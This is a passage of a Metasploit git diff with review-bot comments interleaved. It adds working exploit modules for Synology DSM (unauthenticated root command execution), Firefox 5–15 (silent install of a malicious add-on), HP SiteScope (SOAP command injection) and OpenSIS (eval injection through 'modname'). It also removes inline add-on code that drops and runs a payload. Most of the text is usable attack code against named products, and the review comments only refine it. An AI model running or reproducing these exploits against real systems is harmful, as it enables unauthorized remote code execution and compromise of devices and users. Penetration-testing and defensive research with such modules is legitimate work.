+ # According to rcvalle, all the version have not been checked + # so we're not sure if res.code will be always 500, in order + # to not lose sessions, just print warning and proceeding + unless res and res.code == 500 + print_warning("Unexpected reply but proceeding anyway...") + end + end + + print_status("Sending execute request to #{target_url(controller, action)}...") + send_request_cgi( + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, controller, action) + ) + end + + def upload_file(filename, data) + res = send_request_cgi( + 'method' => datastore['HTTP_METHOD'], + 'uri' => normalize_uri(target_uri.path, 'agent', 'linuxpkgs'), + "vars_#{datastore['HTTP_METHOD'].downcase}" => { + 'data' => Rex::Text.encode_base64(Rex::Text.zlib_deflate(data)), + 'filename' => filename, + 'md5' => Rex::Text.md5(data) + } + ) + + return res + end + + def target_url(*args) + (ssl ? 'https' : 'http') + + if rport.to_i == 80 || rport.to_i == 443 + "://#{vhost}" + else + "://#{vhost}:#{rport}" + end + normalize_uri(target_uri.path, *args) + end +end + diff --git a/modules/exploits/linux/http/synology_dsm_sliceupload_exec_noauth.rb b/modules/exploits/linux/http/synology_dsm_sliceupload_exec_noauth.rb new file mode 100644 index 0000000000..5ed6644527 --- /dev/null +++ b/modules/exploits/linux/http/synology_dsm_sliceupload_exec_noauth.rb 
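Review bot: With ROUTES enabled, `exploit` replaces `config/routes.rb` on the assessed system and nothing in the module records or restores the original; only the controller file is passed to `register_files_for_cleanup`. The option text warns about damage, but the run output never states that the file was changed, so the change is easy to miss when the engagement is written up. I would add `print_warning("#{peer} - config/routes.rb was replaced and has to be restored manually")` after the second upload. The `res and` in both `unless res and res.code == 500` checks is redundant, because a nil `res` has already ended the run through `fail_with`.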
@@ -0,0 +1,163 @@ +## +## This module requires Metasploit: http//metasploit.com/download +## Current source: https://github.com/rapid7/metasploit-framework +### + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + DEVICE_INFO_PATTERN = /major=(?\d+)&minor=(?\d+)&build=(?\d+) + &junior=\d+&unique=synology_\w+_(?[^&]+)/x + + def initialize(info={}) + super(update_info(info, + 'Name' => "Synology DiskStation Manager SLICEUPLOAD Remote Command Execution", + 'Description' => %q{ + This module exploits a vulnerability found in Synology DiskStation Manager (DSM) + versions 4.x, which allows the execution of arbitrary commands under root + privileges. + The vulnerability is located in /webman/imageSelector.cgi, which allows to append + arbitrary data to a given file using a so called SLICEUPLOAD functionality, which + can be triggered by an unauthenticated user with a specially crafted HTTP request. + This is exploited by this module to append the given commands to /redirect.cgi, + which is a regular shell script file, and can be invoked with another HTTP request. + Synology reported that the vulnerability has been fixed with versions 4.0-2259, + 4.2-3243, and 4.3-3810 Update 1, respectively; the 4.1 branch remains vulnerable. 
+ }, + 'Author' => + [ + 'Markus Wulftange' # Discovery, Metasploit module + ], + 'References' => + [ + [ 'CVE', '2013-6955' ], + [ 'OSVDB', '101247' ] + ], + 'Privileged' => false, + 'Platform' => ['unix'], + 'Arch' => ARCH_CMD, + 'Payload' => + { + 'DisableNops' => true, + 'Space' => 0x31337, + 'Compat' => + { + 'PayloadType' => 'cmd', + 'RequiredCmd' => 'generic perl telnet', + } + }, + 'Targets' => + [ + ['Automatic', {}] + ], + 'DefaultTarget' => 0, + 'License' => MSF_LICENSE, + 'DisclosureDate' => 'Oct 31 2013' + )) + + register_options( + [ + Opt::RPORT(5000) + ], self.class) + end + + def check + print_status("#{peer} - Trying to detect installed version") + + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri('webman', 'info.cgi'), + 'vars_get' => { 'host' => ''} + }) + + if res and res.code == 200 and res.body =~ DEVICE_INFO_PATTERN + version = "#{$~[:major]}.#{$~[:minor]}" + build = $~[:build] + model = $~[:model].sub(/^[a-z]+/) { |s| s[0].upcase } + model = "DS#{model}" unless model =~ /^[A-Z]/ + else + print_status("#{peer} - Detection failed") + return Exploit::CheckCode::Unknown + end + + print_status("#{peer} - Model #{model} with version #{version}-#{build} detected") + + case version + when '4.0' + return Exploit::CheckCode::Vulnerable if build < '2259' + when '4.1' + return Exploit::CheckCode::Vulnerable + when '4.2' + return Exploit::CheckCode::Vulnerable if build < '3243' + when '4.3' + return Exploit::CheckCode::Vulnerable if build < '3810' + return Exploit::CheckCode::Detected if build == '3810' + end + + Exploit::CheckCode::Safe + end + + def exploit + cmds = [ + # sed is used to restore the redirect.cgi + "sed -i -e '/sed -i -e/,$d' /usr/syno/synoman/redirect.cgi", + payload.encoded + ].join("\n") + + mime_msg = Rex::MIME::Message.new + mime_msg.add_part('login', nil, nil, 'form-data; name="source"') + mime_msg.add_part('logo', nil, nil, 'form-data; name="type"') + + # unfortunately, Rex::MIME::Message canonicalizes line 
breaks to \r\n, + # so we use a placeholder and replace it later + cmd_placeholder = Rex::Text::rand_text_alphanumeric(10) + mime_msg.add_part(cmd_placeholder, 'application/octet-stream', nil, + 'form-data; name="foo"; filename="bar"') + + post_body = mime_msg.to_s + post_body.strip! + post_body.sub!(cmd_placeholder, cmds) + + # fix multipart encoding + post_body.gsub!(/\r\n(--#{mime_msg.bound})/, ' \\1') + + # send request to append shell commands + print_status("#{peer} - Injecting the payload...") + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri('webman', 'imageSelector.cgi'), + 'ctype' => "multipart/form-data; boundary=#{mime_msg.bound}", + 'headers' => { + 'X-TYPE-NAME' => 'SLICEUPLOAD', + 'X-TMP-FILE' => '/usr/syno/synoman/redirect.cgi' + }, + 'data' => post_body + }) + + unless res and res.code == 200 and res.body.include?('error_noprivilege') + fail_with(Failure::Unknown, "#{peer} - Unexpected response, probably the exploit failed") + end + + # send request to invoke the injected shell commands + print_status("#{peer} - Executing the payload...") + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri('redirect.cgi'), + }) + + # Read command output if cmd/unix/generic payload was used + if datastore['CMD'] + unless res and res.code == 200 + fail_with(Failure::Unknown, "#{peer} - Unexpected response, probably the exploit failed") + end + + print_good("#{peer} - Command successfully executed") + print_line(res.body) + end + end +end + diff --git a/modules/exploits/linux/http/webid_converter.rb b/modules/exploits/linux/http/webid_converter.rb index a8a5e83750..0c6ae762b4 100644 --- a/modules/exploits/linux/http/webid_converter.rb +++ b/modules/exploits/linux/http/webid_converter.rb 
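Review bot: In `check`, the build number is compared as a string (`build < '2259'`, `build < '3243'`, `build < '3810'`), which orders values character by character, so a build with a different digit count is misclassified; a five-digit build starting with 1, for example, sorts below '2259'. Since this result decides whether a DSM host is reported as Vulnerable or Safe, convert once with `build = $~[:build].to_i` and compare against integers (`build < 2259`, `build == 3810`). The named groups of `DEVICE_INFO_PATTERN` are not intact on the page, so the capture names were taken from their use in `check`.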
@@ -99,7 +99,7 @@ class Metasploit3 < Msf::Exploit::Remote ); ?> eof - currencies_php = currencies_php.gsub(/^\t\t\t/, '') + currencies_php = currencies_php.gsub(/^ {6}/, '') pwd = client.fs.dir.pwd print_status("#{peer} - Searching currencies.php file from #{pwd}") diff --git a/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb b/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb new file mode 100644 index 0000000000..234e87b0f0 --- /dev/null +++ b/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb 
@@ -0,0 +1,116 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::BrowserExploitServer
+ include Msf::Exploit::EXE
+ include Msf::Exploit::Remote::FirefoxAddonGenerator
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Firefox 5.0 - 15.0.1 __exposedProps__ XCS Code Execution',
+ 'Description' => %q{
+ On versions of Firefox from 5.0 to 15.0.1, the InstallTrigger global, when given
+ invalid input, would throw an exception that did not have an __exposedProps__
+ property set. By re-setting this property on the exception object's prototype,
+ the chrome-based defineProperty method is made available.
+
+ With the defineProperty method, functions belonging to window and document can be
+ overriden with a function that gets called from chrome-privileged context. From here,
+ another vulnerability in the crypto.generateCRMFRequest function is used to "peek"
+ into the context's private scope. Since the window does not have a chrome:// URL,
+ the insecure parts of Components.classes are not available, so instead the AddonManager
+ API is invoked to silently install a malicious plugin.
+ }, + 'License' => MSF_LICENSE, + 'Author' => [ + 'Mariusz Mlynski', # discovered CVE-2012-3993 + 'moz_bug_r_a4', # discovered CVE-2013-1710 + 'joev' # metasploit module + ], + 'DisclosureDate' => "Aug 6 2013", + 'References' => [ + ['CVE', '2012-3993'], # used to install function that gets called from chrome:// (ff<15) + ['OSVDB', '86111'], + ['URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=768101'], + ['CVE', '2013-1710'], # used to peek into privileged caller's closure (ff<23) + ['OSVDB', '96019'] + ], + 'BrowserRequirements' => { + :source => 'script', + :ua_name => HttpClients::FF, + :ua_ver => lambda { |ver| ver.to_i.between?(5, 15) } + } + )) + + register_options([ + OptString.new('CONTENT', [ false, "Content to display inside the HTML .", '' ] ) + ], self.class) + end + + def on_request_exploit(cli, request, target_info) + if request.uri.match(/\.xpi$/i) + print_status("Sending the malicious addon") + send_response(cli, generate_addon_xpi.pack, { 'Content-Type' => 'application/x-xpinstall' }) + else + print_status("Sending HTML") + send_response_html(cli, generate_html(target_info)) + end + end + + def generate_html(target_info) + injection = if target_info[:ua_ver].to_i == 15 + "Function.prototype.call.call(p.__defineGetter__,obj,key,runme);" + else + "p2.constructor.defineProperty(obj,key,{get:runme});" + end + + %Q| + + + #{datastore['CONTENT']} + + + + + | + end +end diff --git a/modules/exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb b/modules/exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb index 5c05cd2fd0..fde97006f6 100644 --- a/modules/exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb +++ b/modules/exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb @@ -12,6 +12,7 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::EXE + include Msf::Exploit::Remote::FirefoxAddonGenerator def initialize( info = {} ) super( update_info( info, 
@@ -36,55 +37,8 @@ class Metasploit3 < Msf::Exploit::Remote [ 'URL', 'https://developer.mozilla.org/en/Extensions/Bootstrapped_extensions' ], [ 'URL', 'http://dvlabs.tippingpoint.com/blog/2007/06/27/xpi-the-next-malware-vector' ] ], - 'DisclosureDate' => 'Jun 27 2007', - 'Platform' => %w{ java linux osx solaris win }, - 'Payload' => { 'BadChars' => '', 'DisableNops' => true }, - 'Targets' => - [ - [ 'Generic (Java Payload)', - { - 'Platform' => ['java'], - 'Arch' => ARCH_JAVA - } - ], - [ 'Windows x86 (Native Payload)', - { - 'Platform' => 'win', - 'Arch' => ARCH_X86, - } - ], - [ 'Linux x86 (Native Payload)', - { - 'Platform' => 'linux', - 'Arch' => ARCH_X86, - } - ], - [ 'Mac OS X PPC (Native Payload)', - { - 'Platform' => 'osx', - 'Arch' => ARCH_PPC, - } - ], - [ 'Mac OS X x86 (Native Payload)', - { - 'Platform' => 'osx', - 'Arch' => ARCH_X86, - } - ] - ], - 'DefaultTarget' => 1 + 'DisclosureDate' => 'Jun 27 2007' )) - - register_options( [ - OptString.new('ADDONNAME', [ true, - "The addon name.", - "HTML5 Rendering Enhancements" - ]), - OptBool.new('AutoUninstall', [ true, - "Automatically uninstall the addon after payload execution", - true - ]) - ], self.class) end def on_request_uri( cli, request ) @@ -100,6 +54,8 @@ class Metasploit3 < Msf::Exploit::Remote return end + # If we haven't returned yet, then this is a request for our xpi, + # so build one p = regenerate_payload(cli) if not p print_error("Failed to generate the payload.") 
@@ -109,114 +65,8 @@ class Metasploit3 < Msf::Exploit::Remote return end - # If we haven't returned yet, then this is a request for our xpi, - # so build one - - if target.name == 'Generic (Java Payload)' - jar = p.encoded_jar - jar.build_manifest(:main_class => "metasploit.Payload") - payload_file = jar.pack - payload_name='payload.jar' - payload_script=%q| - var java = Components.classes["@mozilla.org/appshell/window-mediator;1"].getService(Components.interfaces.nsIWindowMediator).getMostRecentWindow('navigator:browser').Packages.java - java.lang.System.setSecurityManager(null); - var cl = new java.net.URLClassLoader([new java.io.File(tmp.path).toURI().toURL()]); - var m = cl.loadClass("metasploit.Payload").getMethod("main", [java.lang.Class.forName("[Ljava.lang.String;")]); - m.invoke(null, [java.lang.reflect.Array.newInstance(java.lang.Class.forName("java.lang.String"), 0)]); - | - else - payload_file = generate_payload_exe - payload_name = Rex::Text.rand_text_alphanumeric(8) + '.exe' - payload_script=%q| - var process=Components.classes["@mozilla.org/process/util;1"].createInstance(Components.interfaces.nsIProcess); - process.init(tmp); - process.run(false,[],0); - | - if target.name != 'Windows x86 (Native Payload)' - payload_script = %q| - var chmod=Components.classes["@mozilla.org/file/local;1"].createInstance(Components.interfaces.nsILocalFile); - chmod.initWithPath("/bin/chmod"); - var process=Components.classes["@mozilla.org/process/util;1"].createInstance(Components.interfaces.nsIProcess); - process.init(chmod); - process.run(true, ["+x", tmp.path], 2); - | + payload_script - end - end - - zip = Rex::Zip::Archive.new - xpi_guid = Rex::Text.rand_guid - bootstrap_script = %q| -function startup(data, reason) { - var file = Components.classes["@mozilla.org/file/directory_service;1"]. - getService(Components.interfaces.nsIProperties). 
- get("ProfD", Components.interfaces.nsIFile); - file.append("extensions"); - | - bootstrap_script << %Q|xpi_guid="#{xpi_guid}";| - bootstrap_script << %Q|payload_name="#{payload_name}";| - bootstrap_script << %q| - file.append(xpi_guid); - file.append(payload_name); - var tmp = Components.classes["@mozilla.org/file/directory_service;1"]. - getService(Components.interfaces.nsIProperties). - get("TmpD", Components.interfaces.nsIFile); - tmp.append(payload_name); - tmp.createUnique(Components.interfaces.nsIFile.NORMAL_FILE_TYPE, 0666); - file.copyTo(tmp.parent, tmp.leafName); - | - bootstrap_script << payload_script - - if (datastore['AutoUninstall']) - bootstrap_script << %q| - try { // Fx < 4.0 - Components.classes["@mozilla.org/extensions/manager;1"].getService(Components.interfaces.nsIExtensionManager).uninstallItem(xpi_guid); - } catch (e) {} - try { // Fx 4.0 and later - Components.utils.import("resource://gre/modules/AddonManager.jsm"); - AddonManager.getAddonByID(xpi_guid, function(addon) { - addon.uninstall(); - }); - } catch (e) {} - | - end - - bootstrap_script << "}" - - zip.add_file('bootstrap.js', bootstrap_script) - zip.add_file(payload_name, payload_file) - zip.add_file('chrome.manifest', "content\t#{xpi_guid}\t./\noverlay\tchrome://browser/content/browser.xul\tchrome://#{xpi_guid}/content/overlay.xul\n") - zip.add_file('install.rdf', %Q| - - - #{xpi_guid} - #{datastore['ADDONNAME']} - 1.0 - true - true - - - toolkit@mozilla.org - 1.0 - * - - - - - {ec8030f7-c20a-464f-9b0e-13a3a9e97384} - 1.0 - * - - - -|) -zip.add_file('overlay.xul', %q| - - -|) - print_status("Sending xpi and waiting for user to click 'accept'...") - send_response( cli, zip.pack, { 'Content-Type' => 'application/x-xpinstall' } ) + send_response( cli, generate_addon_xpi.pack, { 'Content-Type' => 'application/x-xpinstall' } ) handler( cli ) end 
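Review bot: In `on_request_uri` the local `p` is now used only for the nil test, because the code that read it (`p.encoded_jar`) is removed and `generate_addon_xpi` is called without arguments. The hunk does not show how the regenerated payload reaches the generated add-on, so the remaining assignment reads like dead code. If the mixin picks up the module's payload itself, a comment above the call such as `# generate_addon_xpi uses the payload regenerated above` would make that explicit. The method starts outside the hunk.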
diff --git a/modules/exploits/multi/browser/java_storeimagearray.rb b/modules/exploits/multi/browser/java_storeimagearray.rb index 6ec63813e2..6562ba8644 100644 --- a/modules/exploits/multi/browser/java_storeimagearray.rb +++ b/modules/exploits/multi/browser/java_storeimagearray.rb @@ -127,7 +127,7 @@ class Metasploit3 < Msf::Exploit::Remote | - html = html.gsub(/^\t\t/, '') + html = html.gsub(/^ {4}/, '') return html end diff --git a/modules/exploits/multi/browser/opera_historysearch.rb b/modules/exploits/multi/browser/opera_historysearch.rb index d3c9d2800f..2c7a1efb27 100644 --- a/modules/exploits/multi/browser/opera_historysearch.rb +++ b/modules/exploits/multi/browser/opera_historysearch.rb @@ -166,7 +166,7 @@ class Metasploit3 < Msf::Exploit::Remote send_not_found(cli) return end - content.gsub!(/^\t{4}/, '') + content.gsub!(/^ {8}/, '') content.gsub!(/\t/, ' ') send_response_html(cli, content, headers) diff --git a/modules/exploits/multi/http/coldfusion_rds.rb b/modules/exploits/multi/http/coldfusion_rds.rb index df50dc1019..f4fe327e7b 100644 --- a/modules/exploits/multi/http/coldfusion_rds.rb +++ b/modules/exploits/multi/http/coldfusion_rds.rb 
@@ -17,11 +17,14 @@ class Metasploit3 < Msf::Exploit::Remote
 super(update_info(info,
 'Name' => 'Adobe ColdFusion 9 Administrative Login Bypass',
 'Description' => %q{
- Adobe ColdFusion 9.0, 9.0.1, 9.0.2, and 10 allows remote attackers to bypass authentication using the RDS component. Its password can
- by default or by misconfiguration be set to an empty value. This allows you to create a session via the RDS login that
- can be carried over to the admin web interface even though the passwords might be different. Therefore bypassing
- authentication on the admin web interface which then could lead to arbitrary code execution.
- Tested on Windows and Linux with ColdFusion 9.
+ Adobe ColdFusion 9.0, 9.0.1, 9.0.2, and 10 allows remote
+ attackers to bypass authentication using the RDS component. Due to
+ default settings or misconfiguration, its password can be set to an
+ empty value. This allows an attacker to create a session via the RDS
+ login that can be carried over to the admin web interface even though
+ the passwords might be different, and therefore bypassing authentication
+ on the admin web interface leading to arbitrary code execution. Tested
+ on Windows and Linux with ColdFusion 9.
 },
 'Author' =>
 [
diff --git a/modules/exploits/multi/http/hp_sitescope_issuesiebelcmd.rb b/modules/exploits/multi/http/hp_sitescope_issuesiebelcmd.rb
new file mode 100644
index 0000000000..221ed08964
--- /dev/null
+++ b/modules/exploits/multi/http/hp_sitescope_issuesiebelcmd.rb
@@ -0,0 +1,164 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'rexml/document' + +class Metasploit3 < Msf::Exploit::Remote + Rank = GreatRanking + + HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } + + include REXML + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::CmdStagerVBS + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'HP SiteScope issueSiebelCmd Remote Code Execution', + 'Description' => %q{ + This module exploits a code execution flaw in HP SiteScope. The vulnerability exists in the + APISiteScopeImpl web service, specifically in the issueSiebelCmd method, which allows the + user to execute arbitrary commands without authentication. This module has been tested + successfully on HP SiteScope 11.20 over Windows 2003 SP2, Windows 2008 and CentOS 6.5. + }, + 'Author' => + [ + 'rgod ', # Vulnerability discovery + 'juan vazquez' # Metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', '2013-4835'], + [ 'OSVDB', '99230' ], + [ 'BID', '63478' ], + [ 'ZDI', '13-263' ] + ], + 'Privileged' => true, + 'Platform' => %w{ win unix }, + 'Arch' => [ ARCH_X86, ARCH_CMD ], + 'Payload' => + { + 'Space' => 2048, + 'DisableNops' => true + }, + 'Targets' => + [ + [ 'HP SiteScope 11.20 / Windows', + { + 'Arch' => ARCH_X86, + 'Platform' => 'win' + } + ], + [ 'HP SiteScope 11.20 / Linux', + { + 'Arch' => ARCH_CMD, + 'Platform' => 'unix', + 'Payload' => + { + 'BadChars' => "\x20\x22\x27\x3c", + 'Compat' => { + 'RequiredCmd' => 'perl python bash-tcp gawk openssl' + } + } + } + ] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Oct 30 2013')) + + register_options( + [ + Opt::RPORT(8080), + OptString.new('TARGETURI', [true, 'Path to SiteScope', '/SiteScope/']) + ], self.class) + end + + def check + value = rand_text_alpha(8 + rand(10)) + + res = send_soap_request(value) + + if res and 
res.code == 500 and res.body.to_s =~ /Cmd Error: User and Password must be specified/ + return Exploit::CheckCode::Appears + end + + return Exploit::CheckCode::Safe + end + + def exploit + + if target.name =~ /Windows/ + print_status("#{peer} - Delivering payload...") + # cmd.exe max length is 8192 + execute_cmdstager({:linemax => 8000, :nodelete => true}) + elsif target.name =~ /Linux/ + print_status("#{peer} - Executing payload...") + execute_command(payload.encoded, {:http_timeout => 1}) + end + end + + def execute_command(cmd, opts={}) + if target.name =~ /Windows/ + cmd.gsub!(/data = Replace\(data, vbCrLf, ""\)/, "data = Replace(data, \" \" + vbCrLf, \"\")") + command = "cmd.exe /c " + command << cmd.gsub(/&/, "&") # HTML Encode '&' character to avoid soap request parsing errors + command << " & /u #{rand_text_alpha(4)} /p #{rand_text_alpha(4)}" # To bypass user and pass flags check before executing + elsif target.name =~ /Linux/ + command = "sh -c " + command << cmd.gsub(/&/, "&") # HTML Encode '&' character to avoid soap request parsing errors + command << " /u #{rand_text_alpha(4)} /p #{rand_text_alpha(4)}" # To bypass user and pass flags check before executing + end + + res = send_soap_request(command, opts[:http_timeout] || 20) + + return if target.name =~ /Linux/ # There isn't response with some ARCH_CMD payloads + + unless res and res.code == 500 and res.body =~ /SiteScope encountered an error associated with running a command/ + fail_with(Failure::Unknown, "#{peer} - Unexpected response, aborting...") + end + end + + def get_soap_request + xml = Document.new + xml.add_element( + "soapenv:Envelope", + { + 'xmlns:xsi' => "http://www.w3.org/2001/XMLSchema-instance", + 'xmlns:xsd' => "http://www.w3.org/2001/XMLSchema", + 'xmlns:soapenv' => "http://schemas.xmlsoap.org/soap/envelope/", + 'xmlns:api' => "http://Api.freshtech.COM" + }) + xml.root.add_element("soapenv:Header") + xml.root.add_element("soapenv:Body") + body = xml.root.elements[2] + 
body.add_element( + "api:issueSiebelCmd", + { + 'soapenv:encodingStyle' => "http://schemas.xmlsoap.org/soap/encoding/" + }) + ser = body.elements[1] + ser.add_element("in0", {'xsi:type' => 'xsd:string'}) + ser.elements['in0'].text = "MSF_COMMAND" + + xml.to_s + end + + def send_soap_request(command, timeout = 20) + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path, 'services', 'APISiteScopeImpl'), + 'method' => 'POST', + 'ctype' => 'text/xml; charset=UTF-8', + 'data' => get_soap_request.gsub(/MSF_COMMAND/, command), # To avoid rexml html encoding + 'headers' => { + 'SOAPAction' => '""' + } + }, timeout) + + return res + end + +end diff --git a/modules/exploits/multi/http/qdpm_upload_exec.rb b/modules/exploits/multi/http/qdpm_upload_exec.rb index e993e72f42..27b4c3b6da 100644 --- a/modules/exploits/multi/http/qdpm_upload_exec.rb +++ b/modules/exploits/multi/http/qdpm_upload_exec.rb @@ -83,7 +83,7 @@ class Metasploit3 < Msf::Exploit::Remote exec("#{fname}"); ?> | - php = php.gsub(/^\t\t/, '').gsub(/\n/, ' ') + php = php.gsub(/^ {4}/, '').gsub(/\n/, ' ') return php end diff --git a/modules/exploits/multi/ssh/sshexec.rb b/modules/exploits/multi/ssh/sshexec.rb index 1d7fa82daa..027144e742 100644 --- a/modules/exploits/multi/ssh/sshexec.rb +++ b/modules/exploits/multi/ssh/sshexec.rb @@ -98,6 +98,7 @@ class Metasploit3 < Msf::Exploit::Remote :msfmodule => self, :port => port, :disable_agent => true, + :config => false, :password => pass } diff --git a/modules/exploits/osx/browser/mozilla_mchannel.rb b/modules/exploits/osx/browser/mozilla_mchannel.rb index 3071fa24f1..b7de8a41ba 100644 --- a/modules/exploits/osx/browser/mozilla_mchannel.rb +++ b/modules/exploits/osx/browser/mozilla_mchannel.rb @@ -147,7 +147,7 @@ class Metasploit3 < Msf::Exploit::Remote HTML # remove the extra tabs - html = html.gsub(/^\t\t/, '') + html = html.gsub(/^ {4}/, '') print_status("Sending #{self.name}") send_response_html(cli, html, { 'Content-Type' => 'text/html' }) 
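Review bot: `include REXML` at class scope in hp_sitescope_issuesiebelcmd.rb mixes every REXML constant into the module class only so that `get_soap_request` can write `Document.new`. A bare `Document` then depends on constant lookup order and can collide with names brought in by the framework mixins. Dropping the include and writing `xml = REXML::Document.new` keeps the dependency explicit; the new zimbra_lfi.rb later in this diff has the same include. The header comment's URL also reads `http//metasploit.com/download` (missing colon after `http`), here and in the other new modules in this diff.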
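Review bot: The added `:config => false` in sshexec.rb has no comment, and the reason for it is not evident from the surrounding option hash. With Net::SSH this option controls whether the client's OpenSSH configuration files are loaded, so the line presumably keeps the operator's local `~/.ssh/config` from altering the connection, in the same spirit as `:disable_agent => true` above it. A trailing comment such as `# do not read the local OpenSSH client config` would record that. The enclosing method starts and ends outside the hunk.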
diff --git a/modules/exploits/unix/webapp/opensis_modname_exec.rb b/modules/exploits/unix/webapp/opensis_modname_exec.rb
new file mode 100644
index 0000000000..6db0c66ab7
--- /dev/null
+++ b/modules/exploits/unix/webapp/opensis_modname_exec.rb
@@ -0,0 +1,159 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info={}) + super(update_info(info, + 'Name' => "OpenSIS 'modname' PHP Code Execution", + 'Description' => %q{ + This module exploits a PHP code execution vulnerability in OpenSIS + versions 4.5 to 5.2 which allows any authenticated user to execute + arbitrary PHP code under the context of the web-server user. + The 'ajax.php' file calls 'eval()' with user controlled data from + the 'modname' parameter. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'EgiX', # Discovery + 'Brendan Coles ' # msf exploit + ], + 'References' => + [ + ['CVE', '2013-1349'], + ['OSVDB', '100676'], + ['URL', 'http://karmainsecurity.com/KIS-2013-10'], + ['URL', 'http://sourceforge.net/p/opensis-ce/bugs/59/'] + ], + 'Payload' => + { + 'BadChars' => "\x00\x0a\x0d", + 'Compat' => + { + 'PayloadType' => 'cmd', + 'RequiredCmd' => 'generic telnet bash netcat netcat-e perl ruby python', + } + }, + 'DefaultOptions' => + { + 'ExitFunction' => 'none' + }, + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Targets' => + [ + # Tested on OpenSIS versions 4.9 and 5.2 (Ubuntu Linux) + ['OpenSIS version 4.5 to 5.2', { 'auto' => true }] + ], + 'Privileged' => false, + 'DisclosureDate' => 'Dec 04 2012', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The URI for OpenSIS', '/opensis/']), + OptString.new('USERNAME', [true, 'The username for OpenSIS']), + OptString.new('PASSWORD', [true, 'The password for OpenSIS']) + ], self.class) + end + + # + # Login + # + def login(user, pass) + @cookie = "PHPSESSID=#{rand_text_alphanumeric(rand(10)+10)};" + print_status("#{peer} - Authenticating as user '#{user}'") + res = send_request_cgi({ + 'method' => 'POST', + 'uri' 
=> normalize_uri(target_uri.path, "index.php"), + 'cookie' => @cookie, + 'vars_post' => Hash[{ + 'USERNAME' => user, + 'PASSWORD' => pass, + }.to_a.shuffle] + }) + if res and res.code == 200 and res.body =~ /Portal\.php/ + print_good("#{peer} - Authenticated as user '#{user}'") + return true + else + print_error("#{peer} - Authenticating as user '#{user}' failed") + return false + end + end + + # + # Send command for execution + # + def execute_command(cmd, opts = { :php_function => 'system' } ) + code = Rex::Text.uri_encode(Rex::Text.encode_base64(cmd+"&")) + junk = rand_text_alphanumeric(rand(10)+6) + print_status("#{peer} - Sending payload (#{code.length} bytes)") + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'ajax.php'), + 'cookie' => @cookie, + 'vars_post' => { + 'modname' => "#{junk}?#{junk}=#{junk}';#{opts[:php_function]}(base64_decode('#{code}'));//" + } + }) + return res + end + + # + # Check credentials are valid and confirm command execution + # + def check + return Exploit::CheckCode::Unknown unless login(datastore['USERNAME'], datastore['PASSWORD']) + fingerprint = Rex::Text.rand_text_alphanumeric(rand(10)+10) + print_status("#{peer} - Sending check") + res = execute_command("echo #{fingerprint}") + if res and res.body =~ /align=center>#{fingerprint}/ + return Exploit::CheckCode::Vulnerable + elsif res + return Exploit::CheckCode::Safe + end + return Exploit::CheckCode::Unknown + end + + def exploit + return unless login(datastore['USERNAME'], datastore['PASSWORD']) + php_function = [ + 'exec', + 'shell_exec', + 'passthru', + 'system' + ].sample + res = execute_command(payload.encoded, { :php_function => php_function }) + if res and res.code == 200 and res.body =~ /hacking_log/i + print_good("#{peer} - Payload sent successfully") + else + fail_with(Failure::UnexpectedReply, "#{peer} - Sending payload failed") + end + end +end + +# +# Source +# +=begin ajax.php +90: 
if(strpos($_REQUEST['modname'],'?')!==false) +91: { +92: $vars = substr($_REQUEST['modname'],(strpos($_REQUEST['modname'],'?')+1)); +93: $modname = substr($_REQUEST['modname'],0,strpos($_REQUEST['modname'],'?')); +94: +95: $vars = explode('?',$vars); +96: foreach($vars as $code) +97: { +98: $code = decode_unicode_url("\$_REQUEST['".str_replace('=',"']='",$code)."';"); +99: eval($code); +100: } +101: } +=end diff --git a/modules/exploits/unix/webapp/zimbra_lfi.rb b/modules/exploits/unix/webapp/zimbra_lfi.rb new file mode 100644 index 0000000000..85800e522e --- /dev/null +++ b/modules/exploits/unix/webapp/zimbra_lfi.rb 
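Review bot: `exploit` treats a 200 response whose body matches `/hacking_log/i` as success, and `check` matches `align=center>` in front of the fingerprint, but neither marker is explained anywhere in the file. A reader cannot tell which part of the application's output these strings come from, or whether they hold for every version in the stated 4.5 to 5.2 range. A one-line comment above each test naming the source of the string would make the checks reviewable and would also document what the request leaves visible on the server side.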
